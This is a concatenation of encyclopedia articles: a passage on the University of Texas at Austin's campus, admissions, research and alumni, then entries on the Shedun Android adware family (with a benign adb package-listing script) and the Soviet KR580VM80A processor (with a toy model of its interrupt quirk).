Constructed in the 1930s under the supervision of creator Carl Eckhardt, then head of the physical plant, the tunnels have grown along with the university campus. They measure approximately six miles in length. The tunnel system is used for communications and utility service. It is closed to the public and guarded by silent alarms. Since the late 1940s, the university has generated its own electricity. Today its natural gas cogeneration plant has a capacity of 123 MW. The university also operates a TRIGA nuclear reactor at the J. J. Pickle Research Campus. The university continues to expand its facilities on campus. In 2010, the university opened the state-of-the-art Norman Hackerman building (on the site of the former Experimental Sciences Building) housing chemistry and biology research and teaching laboratories. In 2010, the university broke ground on the $120 million Bill & Melinda Gates Computer Science Complex and Dell Computer Science Hall and the $51 million Belo Center for New Media, both of which are now complete. The new LEED gold-certified, Student Activity Center (SAC) opened in January 2011, housing study rooms, lounges and food vendors. The SAC was constructed as a result of a student referendum passed in 2006 which raised student fees by $65 per semester. In 2012, the Moody Foundation awarded the College of Communication $50 million, the largest endowment any communication college has received, so naming it the Moody College of Communication. The university operates two public radio stations, KUT with news and information, and KUTX with music, via local FM broadcasts as well as live streaming audio over the Internet. The university uses Capital Metro to provide bus transportation for students around the campus on the UT Shuttle system and throughout Austin. Organization and administration The university contains eighteen colleges and schools and one academic unit, each listed with its founding date: Cockrell School of Engineering (1894) Dell Medical School (2013) College of Education (1905) College of Fine Arts (1938) College of Liberal Arts (1883) College of Natural Sciences (1883) College of Pharmacy (1893 in Galveston, moved to Austin 1927) Continuing Education (1909) Graduate Studies (1910) Jackson School of Geosciences (2005) LBJ School of Public Affairs (1970) McCombs School of Business (1922) Moody College of Communication (1965) School of Architecture (1948) School of Information (1948) School of Law (1883) School of Nursing (1976) School of Undergraduate Studies (2008) Steve Hicks School of Social Work (1950) Academics The University of Texas at Austin offers more than 100 undergraduate and 170 graduate degrees. In the 2009–2010 academic year, the university awarded a total of 13,215 degrees: 67.7% bachelor's degrees, 22.0% master's degrees, 6.4% doctoral degrees, and 3.9% Professional degrees. In addition, the university has eight highly selective honors programs, seven of which span a variety of academic fields: Liberal Arts Honors, the Business Honors Program, the Turing Scholars Program in Computer Science, Engineering Honors, the Dean's Scholars Program in Natural Sciences, the Health Science Scholars Program in Natural Sciences, and the Polymathic Scholars Program in Natural Sciences. The eighth is the Plan II Honors Program, a rigorous interdisciplinary program that is a major in and of itself. Many Plan II students pursue a second major, often participating in another department's honors program in addition to Plan II. 
The university also offers programs such as the Freshman Research Initiative and the Texas Interdisciplinary Plan. Admission The University of Texas at Austin is one of the most selective universities in the region. Relative to other universities in the state of Texas, UT Austin is second to Rice University in selectivity, according to a Business Journal study weighing acceptance rates and the mid-range of the SAT and ACT. The University of Texas at Austin was ranked as the 18th most selective in the South. As a state public university, UT Austin was subject to Texas House Bill 588, which guaranteed Texas high school seniors graduating in the top 10% of their class admission to any public Texas university. A new state law granting UT Austin (but no other state university) a partial exemption from the top 10% rule, Senate Bill 175, was passed by the 81st Legislature in 2009. It modified this admissions policy by limiting automatically admitted freshmen to 75% of the entering in-state freshman class, starting in 2011. Under this policy, the university admits the top one percent, the top two percent, and so forth until the cap is reached; it currently admits the top 6 percent. Furthermore, students admitted under Texas House Bill 588 are not guaranteed their choice of college or major, but rather only guaranteed admission to the university as a whole. Many colleges, such as the Cockrell School of Engineering, have secondary requirements that must be met for admission. For those who go through the traditional application process, admissions are rated "more selective" by the Carnegie Foundation for the Advancement of Teaching and by U.S. News & World Report. For Fall 2017, 51,033 applied and 18,620 were accepted (36.5%), and of those accepted, 45.2% enrolled. Among freshman students who enrolled in Fall 2017, SAT scores for the middle 50% ranged from 570 to 690 for critical reading and 600–710 for math. ACT composite scores for the middle 50% ranged from 26 to 31. In terms of class rank, 74.4% of enrolled freshmen were in the top 10% of their high school classes and 91.7% ranked in the top quarter. For Fall 2019, 53,525 undergraduate students applied, 17,029 were admitted, and 8,170 enrolled in the university full or part time, making the overall acceptance rate 31.8%. Rankings The University of Texas at Austin (UT Austin) was ranked tied for 38th among all universities in the U.S., and tied for 10th place among public universities, according to U.S. News & World Report's 2022 rankings. Internationally, UT Austin was ranked 34th in the 2020 "Best Global Universities" ranking by U.S. News & World Report, 45th in the world by the Academic Ranking of World Universities (ARWU) in 2019, 39th worldwide by the Times Higher Education World University Rankings (2019), and 65th globally by the QS World University Rankings (2020). UT Austin was also ranked 31st in the world by the Center for World University Rankings (CWUR). The University of Texas at Austin is considered to be a "Public Ivy"—a public university that provides an Ivy League collegiate experience at a public school price, having been ranked in virtually every list of "Public Ivies" since Richard Moll coined the term in his 1985 book Public Ivies: A Guide to America's best public undergraduate colleges and universities. 
The seven other "Public Ivy" universities, according to Moll, were The College of William & Mary, Miami University, The University of California, The University of Michigan, The University of North Carolina, The University of Vermont, and The University of Virginia. In its 2016 edition of college rankings, U.S. News & World Report ranked the Accounting and Latin American History programs as the top in the nation and more than 50 other science, humanities, and professional programs rank in the top 25 nationally. The College of Pharmacy is listed as the third-best in the nation and The School of Information (iSchool) is sixth-best in Library and Information Sciences. Among other rankings, the School of Social Work is 7th, the Jackson School of Geosciences is 8th for Earth Sciences, the Cockrell School of Engineering is tied for 10th-best (with the undergraduate engineering program tied for 11th-best in the country), the Nursing School is tied for 13th, the University of Texas School of Law is 15th, the Lyndon B. Johnson School of Public Affairs is 7th, and the McCombs School of Business is tied for 16th-best (with the undergraduate business program tied for 5th-best in the country). The University of Texas School of Architecture was ranked second among national undergraduate programs in 2012. A 2005 Bloomberg survey ranked the school 5th among all business schools and first among public business schools for the largest number of alumni who are S&P 500 CEOs. Similarly, a 2005 USA Today report ranked the university as "the number one source of new Fortune 1000 CEOs". A "payback" analysis published by SmartMoney in 2011 comparing graduates' salaries to tuition costs concluded the school was the second-best value of all colleges in the nation, behind only Georgia Tech. A 2013 College Database study found that UT Austin was 22nd in the nation in terms of increased lifetime earnings by graduates. Research UT Austin is classified among "R1: Doctoral Universities – Very high research activity." For the 2014–2015 cycle, the university was awarded over $580 million in sponsored projects, and has earned more than 300 patents since 2003. The University of Texas at Austin houses the Office of Technology Commercialization, a technology transfer center which serves as the bridge between laboratory research and commercial development. In 2009, the university created nine new start-up companies to commercialize technology developed at the university and has created 46 start-ups in the past seven years. License agreements generated $10.9 million in revenue for the university in 2009. Research at UT Austin is largely focused in the engineering and physical sciences, and the university is a world-leading research institution in fields such as computer science. Energy is a major research thrust, with federally funded projects on biofuels, battery and solar cell technology, and geological carbon dioxide storage, water purification membranes, among others. In 2009, the University of Texas founded the Energy Institute, led by former Under Secretary for Science Raymond L. Orbach, to organize and advance multi-disciplinary energy research. In addition to its own medical school, it houses medical programs associated with other campuses and allied health professional programs, as well as major research programs in pharmacy, biomedical engineering, neuroscience, and others. 
In 2010, the University of Texas at Austin opened the $100 million Dell Pediatric Research Institute to increase medical research at the university and establish a medical research complex, and associated medical school, in Austin. The university operates several major auxiliary research centers. The world's third-largest telescope, the Hobby–Eberly Telescope, and three other large telescopes are part of the university's McDonald Observatory, west of Austin. The university manages several biological field laboratories, including the Brackenridge Field Laboratory in Austin. The Center for Agile Technology focuses on software development challenges. The J.J. Pickle Research Campus (PRC) is home to the Texas Advanced Computing Center, which operates a series of supercomputers, such as Ranger (from 2008 to 2013), Stampede (2013–2017), Stampede2 (since 2017), and Frontera (since 2019). The Pickle campus also hosts the Microelectronics Research Center, which houses micro- and nanoelectronics research and features a cleanroom for device fabrication. Founded in 1946, the university's Applied Research Laboratories at the PRC has developed or tested the vast majority of the Navy's high-frequency sonar equipment. In 2007, the Navy granted it a research contract funded up to $928 million over ten years. The Institute for Advanced Technology, founded in 1990 and located in the West Pickle Research Building, supports the U.S. Army with basic and applied research in several fields. The Center for Transportation Research is a nationally recognized research institution focusing on transportation research, education, and public service. Established in 1963 as the Center for Highway Research, the center conducts projects addressing virtually all aspects of transportation, including economics, multimodal systems, traffic congestion relief, transportation policy, materials, structures, transit, environmental impacts, driver behavior, land use, geometric design, accessibility, and pavements. In 2013, the University of Texas at Austin announced the naming of the O'Donnell Building for Applied Computational Engineering and Sciences. The O'Donnell Foundation of Dallas, headed by Peter O'Donnell and his wife, Edith Jones O'Donnell, gave more than $135 million to the university between 1983 and 2013. University president William C. Powers declared the O'Donnells "among the greatest supporters of the University of Texas in its 130-year history. Their transformative generosity is based on the belief in our power to change society for the better." In 2008, O'Donnell pledged $18 million to finance the hiring of university faculty members undertaking research in mathematics, computers, and multiple scientific disciplines; his pledge was matched by W. A. "Tex" Moncrief Jr., an oilman and philanthropist from Fort Worth. The University of Texas at Austin Marine Science Institute is located on the Gulf coast in Port Aransas. Established in 1941, UTMSI was the first permanent marine research facility in the state of Texas and has since contributed significantly to the understanding of marine ecosystems. Research at the Marine Science Institute ranges from locally important work on mariculture and estuarine ecosystems to the investigation of global issues in marine science, from the Arctic to the tropics. Endowment The University of Texas at Austin is entitled to at least 30% of the distributions from the Permanent University Fund (PUF), which held over $33 billion in assets as of year-end 2021. 
The University of Texas System gets two-thirds of the Available University Fund (the name of the annual distribution of the PUF's income), and the Texas A&M University System gets the other third. A regental policy requires that at least 45 percent of the UT System's share of this money go to the University of Texas at Austin for "program enrichment". Multiplying two-thirds by 45 percent gives 30 percent, the minimum share of AUF income that can be distributed to the school under current policies. The Regents, however, can decide to allocate additional amounts to the university. Also, the majority of the University of Texas System's share of the AUF is used for its debt service bonds, some of which were issued for the benefit of the Austin campus. The Regents can change the 45 percent minimum of the University of Texas System's share that goes to the Austin campus at any time, although doing so might be difficult politically. Proceeds from lands appropriated in 1839 and 1876, as well as oil monies, comprise the majority of the PUF. At one time, the PUF was the chief source of income for Texas' two university systems, the University of Texas System and the Texas A&M University System; today, however, its revenues account for less than 10 percent of the universities' annual budgets. This has challenged the universities to increase sponsored research and private donations. Privately funded endowments contribute over $2 billion to the university's total endowment. The University of Texas System also has about $22 billion of assets in its General Endowment Fund. Student life Student profile For Fall 2011, the university enrolled 38,437 undergraduate, 11,497 graduate and 1,178 law students. Out-of-state and international students comprised 9.1% of the undergraduate student body and 20.1% of the total student body, with students from all 50 states and more than 120 foreign countries—most notably, the Republic of Korea, followed by the People's Republic of China, India, Mexico, and Taiwan. For Fall 2015, the undergraduate student body was 48.9% male and 51.1% female. The three largest undergraduate majors in 2009 were Biological Sciences, Unspecified Business, and Psychology, while the three largest graduate majors were Business Administration (MBA), Electrical and Computer Engineering, and Pharmacy (PharmD). Residential life The campus has fourteen residence halls, the newest of which opened in Spring 2007. On-campus housing can hold more than 7,100 students. Jester Center is the largest residence hall, with a capacity of 2,945. Academic enrollment exceeds the on-campus housing capacity; as a result, most students must live in private residence halls, housing cooperatives, apartments, or with Greek organizations and other off-campus residences. University Housing and Dining, which already holds the largest market share with 7,000 of the estimated 27,000 beds in the campus area, plans to expand to 9,000 beds. Student organizations The university recognizes more than 1,300 student organizations. In addition, it supports three official student governance organizations that represent student interests to faculty, administrators, and the Texas Legislature. Student Government, established in 1902, is the oldest governance organization and represents student interests in general. The Senate of College Councils represents students in academic affairs and coordinates the college councils, and the Graduate Student Assembly represents graduate student interests. 
The University Unions Student Events Center serves as the hub for student activities on campus. The Friar Society serves as the oldest honor society at the university and recognizes students who have made significant contributions to the school. Texas Orange Jackets, founded in 1923, is the oldest women's honorary service organization on campus and empowers young women leaders to serve the campus and community. The Texas Blazers, an honorary service organization, act as official hosts of the university. Texas 4000 for Cancer is another student organization, which also doubles as an Austin-based nonprofit, that hosts a 4,500-mile bike ride from Austin, Texas to Anchorage, Alaska, thus far raising over $5 million for cancer research and patient support services since its inception in 2004. Greek life The University of Texas at Austin is home to an active Greek community. Approximately 14 percent of undergraduate students are in fraternities or sororities. With more than 65 national chapters, the university's Greek community is one of the nation's largest. These chapters are under the authority of one of the school's six Greek council communities, Interfraternity Council, National Pan-Hellenic Council, Texas Asian Pan-Hellenic Council, Latino Pan-Hellenic Council, Multicultural Greek Council and University Panhellenic Council. Other registered student organizations also name themselves with Greek letters and are called affiliates. They are not a part of one of the six councils but have all of the same privileges and responsibilities of any other organization. Most Greek houses are west of the Drag in the West Campus neighborhood. Media Students express their opinions in and out of class through periodicals including Study Breaks magazine, Longhorn Life, The Daily Texan (the most award-winning daily college newspaper in the United States), and the Texas Travesty. Over the airwaves students' voices are heard through Texas Student Television (K29HW-D) and KVRX Radio. The Computer Writing and Research Lab of the university's Department of Rhetoric and Writing also hosts the Blogora, a blog for "connecting rhetoric, rhetorical methods and theories, and rhetoricians with public life" by the Rhetoric Society of America. Traditions Traditions at the University of Texas are perpetuated through several school symbols and mediums. At athletic events, students frequently sing "Texas Fight", the university's fight song while displaying the Hook 'em Horns hand gesture—the gesture mimicking the horns of the school's mascot, Bevo the Texas Longhorn. Athletics The University of Texas offers a wide variety of varsity and intramural sports programs. On June 12, 2020, UT student-athletes banded together with their #WeAreOne statement on Twitter. Among the list of changes included: renaming certain campus buildings, replacing statues, starting outreach programs, and replacing "The Eyes of Texas." UT Interim President Jay Hartzell released a statement on July 13, 2020, announcing the changes to be implemented in light of these demands from UT student-athletes. Hartzell said the university would make a multi-million dollar investment to programs that recruit, retain and support Black students; rename the Robert L. Moore Building as the Physics, Math and Astronomy Building; honor Heman M. Sweatt in numerous ways, including placing a statue of Sweatt near the entrance of  T.S. 
Painter Hall; honor the Precursors, the first Black undergraduates to attend The University of Texas at Austin, by commissioning a new monument on the East Mall; erect a statue for Julius Whittier, the Longhorns’ first Black football letterman, at DKR-Texas Memorial Stadium; and more. However, one of the most controversial topics on the list – replacing "The Eyes of Texas" as UT's alma mater – remained untouched. Varsity sports The university's men's and women's athletics teams are nicknamed the Longhorns. Texas has won 50 total national championships, 42 of which are NCAA national championships. The football team experienced its greatest success under coach Darrell Royal, winning three national championships in 1963, 1969, and 1970. It won a fourth title under head coach Mack Brown in 2005 after a 41–38 victory over previously undefeated Southern California in the 2006 Rose Bowl. The University's baseball team has made more trips to the College World Series (35) than any other school, and won championships in 1949, 1950, 1975, 1983, 2002, and 2005. Additionally, the university's men's and women's swimming and diving teams lay claim to sixteen NCAA Division I titles, with the men's team having 13 of those titles, more than any other Division 1 team. The swim team was first developed under Coach Tex Robertson. Notable people Faculty In the Fall of 2016, the school employed 3,128 full-time faculty members, with a student-to-faculty ratio of 18.86 to 1. These include winners of the Nobel Prize, the Pulitzer Prize, the National Medal of Science, the National Medal of Technology, the Turing Award, the Primetime Emmy Award, and other various awards. Nine Nobel Laureates are or have been affiliated with the University of Texas at Austin. Research expenditures for the university exceeded $679.8 million in fiscal year 2018. Alumni Texas Exes is the official University of Texas alumni organization. The Alcalde, founded in 1913 and pronounced "all-call-day," is the university's alumni magazine. At least 15 graduates have served in the U.S. Senate or U.S. House of Representatives, including Lloyd Bentsen '42, who served in both Houses. Presidential cabinet members include former U.S. Secretaries of State Rex Tillerson '75, and James Baker '57, former U.S. Secretary of Education William J. Bennett, and former U.S. Secretary of Commerce Donald Evans '73. Former First Lady Laura Bush '73 and daughter Jenna '04 both graduated from Texas, as well as former First Lady Lady Bird Johnson '33 & '34 and her eldest daughter Lynda. In foreign governments, the university has been represented by Fernando Belaúnde Terry '36 (42nd President of Peru) and by Abdullah al-Tariki (co-founder of OPEC). Additionally, the Prime Minister of the Palestinian National Authority, Salam Fayyad, graduated from the university with a PhD in economics. Tom C. Clark, J.D. '22, served as United States Attorney General from 1945 to 1949 and as an Associate Justice of the Supreme Court of the United States from 1949 to 1967. Alumni in academia include the 26th President of The College of William & Mary Gene Nichol '76, the 10th President of Boston University Robert A. Brown '73 & '75, and the 8th President of the University of Southern California John R. Hubbard. The university also graduated Alan Bean '55, the fourth man to walk on the Moon. Additionally, alumni who have served as business leaders include Secretary of State and former ExxonMobil Corporation CEO Rex Tillerson '75, Dell founder and CEO Michael Dell, and Gary C. 
Kelly, Southwest Airlines's CEO. In literature and journalism, the school boasts 20 Pulitzer Prizes to 18 former students, including Gail Caldwell and Ben Sargent '70. Walter Cronkite, the former CBS Evening News anchor once called the most trusted man in America, attended the University of Texas at Austin, as did CNN anchor Betty Nguyen '95. Alumnus J. M. Coetzee also received the 2003 Nobel Prize in Literature. Novelist Raymond Benson ('78) was the official author of James Bond novels between 1996 and 2002, the only American to be commissioned to pen them. Donna Alvermann, a distinguished research professor at the University of Georgia, Department of Education also graduated from the University of Texas, as did Wallace Clift ('49) and Jean Dalby Clift ('50, J.D. '52), authors of several books in the fields of psychology of religion and spiritual growth. Notable alumni authors also include Kovid Gupta ('2010), author of several bestselling books, Ruth Cowan Nash ('23), America's first woman war correspondent, and Alireza Jafarzadeh, author of "The Iran Threat: President Ahmadinejad and the Coming Nuclear Crisis" and television commentator ('82, MS). Although expelled from the university, former student and The Daily Texan writer John Patric went on to become a noted writer for National Geographic, Reader's Digest, and author of 1940s best-seller Why Japan was Strong. University of Texas at Austin alumni also include 112 Fulbright Scholars, 31 Rhodes Scholars, 28 Truman Scholars, 23 Marshall Scholars, and nine astronauts. Several musicians and entertainers attended the university. Janis Joplin, the American singer posthumously inducted into the Rock and Roll Hall of Fame who received a Grammy Lifetime Achievement Award, attended the university, as did February 1955 Playboy Playmate of the Month and Golden Globe recipient Jayne Mansfield. Composer Harold Morris is a 1910 graduate. Noted film director, cinematographer, writer, and editor Robert Rodriguez is a Longhorn, as are actors Eli Wallach and Matthew McConaughey, the latter of which now teaches a class at the university. Rodriguez dropped out of the university after two years to pursue his career in Hollywood, but completed his degree from the Radio-Television-Film department on May 23, 2009. Rodriguez also gave the keynote address at the university-wide commencement ceremony. Radio-Television-Film alumni Mark Dennis and Ben Foster took their award-winning feature film, Strings, to the American film festival circuit in 2011. Web and television actress Felicia Day and film actress Renée Zellweger attended the university. Day graduated with degrees in music performance (violin) and mathematics, while Zellweger graduated with a BA in English. Writer and recording artist Phillip Sandifer graduated with a degree in History. Michael "Burnie" Burns is an actor, writer, film director and film producer who graduated with a degree in Computer Science. He, along with graduate Matt Hullum, also founded the Austin-based production company Rooster Teeth, that produces many hit shows, including the award-winning Internet series, Red vs. Blue. Farrah Fawcett, one of the original Charlie's Angels, left after her junior year to pursue a modeling career. Actor Owen Wilson and writer/director Wes Anderson attended the university, where they wrote Bottle Rocket together, which became Anderson's first feature film. Writer and producer Charles Olivier is a Longhorn. 
So too are filmmakers and actors Mark Duplass and his brother Jay Duplass, key contributors to the mumblecore film genre. Another notable writer, Rob Thomas graduated with a BA in History in 1987 and later wrote the young adult novel Rats Saw God and created the series Veronica Mars. Illustrator, writer and alum Felicia Bond is best known for her illustrations in the If You Give... children's books series, starting with If You Give a Mouse a Cookie. Taiwanese singer-songwriter, producer, actress Cindy Yen (birth name Cindy Wu) graduated with double degrees in Music (piano performance) and Broadcast Journalism in 2008. Noted composer and arranger Jack Cooper received his D.M.A. in 1999 from The University of Texas at Austin in composition and has gone on to teach in higher education and become known internationally through the music publishing industry. Actor Trevante Rhodes competed as a sprinter for the Longhorns and graduated with a BS in Applied Learning and Development in 2012. In 2016, he starred as Chiron in the Academy Award- and Golden Globe-winning film Moonlight. Many alumni have found success in professional sports. Legendary pro football coach Tom Landry '49 attended the university as an industrial engineering major but interrupted his education after a semester to serve in the United States Army Air Corps during World War II. Following the war, he returned to the university and played fullback and defensive back on the Longhorns' bowl-game winners on New Year's Day of 1948 and 1949. Seven-time Cy Young Award-winner Roger Clemens entered the MLB after helping the Longhorns win the 1983 College World Series. NBA MVP and four-time scoring champion Kevin Durant entered the 2007 NBA Draft and was selected second overall behind Greg Oden, after sweeping National Player of the Year honors, becoming the first freshman to win any of the awards. After becoming the first freshman in school history to lead Texas in scoring and being named the Big 12 Freshman of the Year, Daniel Gibson entered the 2006 NBA draft and was selected in the second round by the Cleveland Cavaliers. In his one year at Texas, golfer Jordan Spieth led the University of Texas Golf club to the NCAA Men's Golf Championship in 2012 and went on to win The Masters Tournament three years after leaving the university. Several Olympic medalists have also attended the school, including 2008 Summer Olympics athletes Ian Crocker '05 (swimming world record holder and two-time Olympic gold medalist) and 4 × 400 m relay defending Olympic gold medalist Sanya Richards '06. Mary Lou Retton (the first female gymnast outside Eastern Europe to win the Olympic all-around title, five-time Olympic medalist, and 1984 Sports Illustrated Sportswoman of the Year) also attended the university. Garrett Weber-Gale, a two-time Olympic gold medalist, and world record-holder in two events, was a swimmer for the school. Also an alumnus is Dr. Robert Cade, the inventor of the sports drink Gatorade. In big, global philanthropy, the university is honored by Darren Walker, president of Ford Foundation. Other notable alumni include prominent businessman Red McCombs, Diane Pamela Wood, the first female chief judge of the United States Court of Appeals for the Seventh Circuit, astrophysicist Neil deGrasse Tyson, chemist Donna J. Nelson, and neuroscientist Tara Spires-Jones. Also an alumnus is Admiral William H. McRaven, credited for organizing and executing Operation Neptune's Spear, the special ops raid that led to the death of Osama bin Laden. 
Oveta Culp Hobby, the first woman to earn the rank of colonel in the United States Army, the first commanding officer and director of the Women's Army Corps, and the first secretary of the Department of Health, Education, and Welfare, attended the university as well. Keene Prize for Literature The Keene Prize for Literature is a student literary award given by the university. With a prize of $50,000, it claims to be "one of the world's largest student literary prizes". An additional $50,000 is split among three finalists. The purpose of the award is to "help maintain the university's status as a premier location for emerging writers", and to recognize the winners and their works. The prize was established in 2006, in the College of Liberal Arts. It is named after E. L. Keene, a 1942 graduate of the university. See also ArchNet – A joint project between the university and MIT on Islamic architecture Cactus Cafe Institute for Computational Engineering and Sciences List of University of Texas at Austin presidents Silicon Hills University of Texas at Austin High School University of Texas at Austin admissions controversy University of Texas Elementary School University of Texas Sailing Team References Notes External links University of Texas at Austin Athletics website 1883 establishments in Texas Educational institutions established in 1883 Flagship universities in the United States Tourist attractions in Austin, Texas Universities and colleges accredited by the Southern Association of Colleges and Schools Universities and colleges in Austin, Texas University of Texas Austin Austin
50084266
https://en.wikipedia.org/wiki/Shedun
Shedun
Shedun is a family of malware (also known as Kemoge, Shiftybug and Shuanet) targeting the Android operating system, first identified in late 2015 by mobile security company Lookout and affecting roughly 20,000 popular Android applications. Lookout claimed the HummingBad malware was also a part of the Shedun family; however, these claims were refuted. Avira Protection Labs stated that Shedun-family malware was detected causing approximately 1,500–2,000 infections per day. All three variants of the virus are known to share roughly 80% of the same source code. In mid-2016, Ars Technica reported that approximately 10,000,000 devices were infected by this malware and that new infections were still surging. The malware's primary attack vector is repackaging legitimate Android applications (e.g. Facebook, Twitter, WhatsApp, Candy Crush, Google Now, Snapchat) with adware included. The repackaged app, which remains functional, is then released to a third-party app store; once downloaded, the application generates revenue by serving ads (estimated to amount to US$2 per installation). Most users cannot get rid of the malware without getting a new device, as the only other way to remove it is to root the affected device and re-flash a custom ROM. In addition, Shedun-type malware has been detected pre-installed on 26 different types of Chinese Android-based hardware such as smartphones and tablet computers. Shedun-family malware is known for auto-rooting the Android OS using well-known exploits like ExynosAbuse, Memexploit and Framaroot (causing a potential privilege escalation), for serving trojanized adware, and for installing itself within the system partition of the operating system, so that not even a factory reset can remove the malware from infected devices. Shedun malware is also known for targeting the Android Accessibility Service, as well as for downloading and installing arbitrary applications (usually adware) without permission. It is classified as "aggressive adware" for installing potentially unwanted applications and serving ads. As of April 2016, Shedun malware was considered by most security researchers to be next to impossible to remove entirely. Avira security researcher Pavel Ponomariov, who specializes in Android malware detection tools, mobile threat detection, and mobile malware detection automation research, has published an in-depth analysis of this malware. See also Brain Test Dendroid (Malware) Computer virus File binder Individual mobility Malware Trojan horse (computing) Worm (computing) Mobile operating system References Software distribution Trojan horses Social engineering (computer security) Rootkits Privilege escalation exploits Adware Online advertising Android (operating system) malware Mobile security Spyware Privacy
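Because Shedun-family adware copies itself into the system partition, one of the few checks an affected user can make without re-flashing is to inspect which packages live on that partition. The following is a minimal illustrative sketch, not taken from Lookout's or Avira's published analyses; it assumes the standard Android adb tool is installed and a device is connected with USB debugging enabled, and it does not attempt to decide which entries are legitimate.

```python
# Sketch: list packages installed on the system partition of a connected Android device.
# Shedun-style adware that has copied itself into /system would appear in this list;
# telling legitimate entries apart still requires comparing against the stock vendor image.
import subprocess

def list_system_packages() -> list[str]:
    # "pm list packages -s -f" prints only system packages together with their APK paths.
    out = subprocess.run(
        ["adb", "shell", "pm", "list", "packages", "-s", "-f"],
        capture_output=True, text=True, check=True,
    ).stdout
    return [line.removeprefix("package:").strip() for line in out.splitlines() if line.strip()]

if __name__ == "__main__":
    for entry in list_system_packages():
        # Entries look like "/system/app/Example/Example.apk=com.example.app".
        print(entry)
```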
11801329
https://en.wikipedia.org/wiki/KR580VM80A
KR580VM80A
The KR580VM80A () is a Soviet microprocessor, a clone of the Intel 8080 CPU. Different versions of this CPU were manufactured beginning in the late 1970s, the earliest known use being in the SM1800 computer in 1979. Initially called the K580IK80 (К580ИК80), it was produced in a 48-pin planar metal-ceramic package. Later, a version in a PDIP-40 package was produced and was named the KR580IK80A (КР580ИК80А). The pin layout of the latter completely matched that of Intel's 8080A CPU. In 1986 this CPU received a new part number to conform with the 1980 Soviet integrated circuit designation and became known as the KR580VM80A (КР580ВМ80А), the number it is most widely known by today (the KR580VV51A and KR580VV55A peripheral devices went through similar revisions). Normal clock frequency for the K580IK80A is 2 MHz, with speeds up to 2.5 MHz for the KR580VM80A. The KR580IK80A was manufactured in a 6 µm process. In the later KR580VM80A the feature size was reduced to 5 µm and the die became 20% smaller. Technology and support chips The KR580VM80A was manufactured with an n-MOS process. The pins were electrically compatible with TTL logic levels. The load capacity of each output pin was sufficient for one TTL input. The output capacitance of each control and data pin was ≤ 100 pF. The family consists of the following chips: For brevity, the table above lists only the chip variants in a plastic DIP (prefix КР) as well as the original planar package (prefix К). Not listed separately are variants in a ceramic DIP (prefix КМ for the commercial version and prefix М or no prefix for the military version) or export variants (prefix ЭКР) in a plastic DIP but with a pin spacing of one tenth of an inch. For the KR580VM1 (КР580ВМ1) see Further development below. Several integrated circuits in the K580 series were actually intended for other microprocessor families: the KR580VR43 (КР580ВР43 — Intel 8243) for the K1816 family (Intel MCS-48) and the KR580GF84 (КР580ГФ84 — Intel 8284) / KR580VG88 (КР580ВГ88 — Intel 8288) / KR580VB89 (КР580ВБ89 — Intel 8289) for the K1810 family (Intel 8086). Additionally, most devices in the K580 series could be used for the K1810 series as well. KR580VM80A vs. Intel 8080A While the Soviet clone appears to be fully software-compatible with the Intel 8080A, there is a slight difference between the two processors' interrupt handling logic, which looks like an error in the KR580VM80A's microcode. If a CALL instruction opcode is supplied during an INTA cycle and the INT input remains asserted, the KR580VM80A does not clear its internal Interrupt Enable flag, despite the INTE output going inactive. As a result, the CPU enters a microcode loop, continuously acknowledging the interrupt and pushing the PC onto the stack, which leads to stack overflow (a toy model of this divergence is sketched at the end of this article). In a typical hardware configuration this phenomenon is masked by the behavior of the 8259A interrupt controller, which deasserts INT during the INTA cycle. The Romanian MMN8080 behaves the same as the KR580VM80A; no other 8080A clones seem to be affected by this error. Applications The KR580VM80A was popular in home computers, computer terminals, and industrial controllers. 
Some of the examples of its successful application are: KUVT Korvet educational computer Radio-86RK (Радио 86РК), probably the most popular amateur single-board computer in the Soviet Union Micro-80 (Микро-80 in Russian), Radio 86RK's predecessor Orion-128 (Орион-128 in Russian), Radio 86RK's successor, which had a graphical display Specialist (computer), similar to Orion-128 SM 1800 industrial mini computer Vector-06C home computer, where KR580VM80A is overclocked to 3 MHz by design TIA-MC-1 (ТИА-МЦ-1) arcade machine Juku ES101 educational computer designed in Estonia Maestro (Маэстро) soviet four voice hybrid analog synthesizer keyboard Further development Mirroring the development in the West, where the Intel 8080 was succeeded by the binary compatible Intel 8085 and Zilog Z80 as well as the source compatible Intel 8086, the Soviet Union produced the IM1821VM85A (ИМ1821ВМ85А, actually the CMOS version Intel 80C85), KR1858VM1 (КР1858ВМ1), and K1810VM86 (К1810ВМ86), respectively. The 580VM80 is still shown on the price list of 1 July 2020 of the "Kvazar" plant in Kyiv together with various support chips of the K580 series. Another development, the KR580VM1 (КР580ВМ1), has no western equivalent. The KR580VM1 extends the Intel 8080 architecture and is binary compatible with it. The extensions differ, however, from both the Intel 8085 and the Zilog Z80. The KR580VM1 extends the address range from 64KB to 128KB. It adds two registers, H1 and L1, that can be used instead of H and L. Several 16-bit arithmetic instructions were added as well (DAD, DSUB, DCOMP). Just like the Intel 8085 and the Zilog Z80, the KR580VM1 needs only a single +5V power supply instead of the three voltages required by the KR580VM80A. The maximum clock frequency was increased from 2 MHz to 5 MHz while the power consumption was reduced from 1.35W to 0.5W, compared to the KR580VM80A. See also Intel 8080 MCS-85 Family List of Soviet computer systems Soviet integrated circuit designation References External links CPU World page about KR580VM80A Reverse-engineering of KR580VM80A Computer-related introductions in 1979 Computing in the Soviet Union 8-bit microprocessors
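The interrupt-acknowledge divergence described in the "KR580VM80A vs. Intel 8080A" section above can be illustrated with a toy Python model. This is an illustrative simplification, not emulator-accurate code: it tracks only the internal Interrupt Enable flag and the stack depth, which is enough to show why the KR580VM80A loops while the 8080A services the interrupt once.

```python
# Toy model: a CALL opcode is supplied during the INTA cycle while the INT input stays
# asserted. The genuine 8080A clears its internal Interrupt Enable flag and acknowledges
# once; the KR580VM80A does not, so it keeps acknowledging and pushing the PC until the
# stack overflows.

def acknowledgements(clears_int_enable: bool, stack_limit: int = 16) -> int:
    int_enable = True          # internal Interrupt Enable flag
    int_asserted = True        # external INT input held active by the device
    stack_depth = 0
    acks = 0
    while int_enable and int_asserted:
        acks += 1
        stack_depth += 1       # the CALL pushes the PC onto the stack
        if clears_int_enable:
            int_enable = False # 8080A behaviour: further interrupts are masked
        elif stack_depth > stack_limit:
            break              # KR580VM80A behaviour: runaway loop overflows the stack
    return acks

print("Intel 8080A: ", acknowledgements(clears_int_enable=True), "acknowledgement")
print("KR580VM80A:", acknowledgements(clears_int_enable=False),
      "acknowledgements before a 16-level stack overflows")
```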
5868484
https://en.wikipedia.org/wiki/QSOS
QSOS
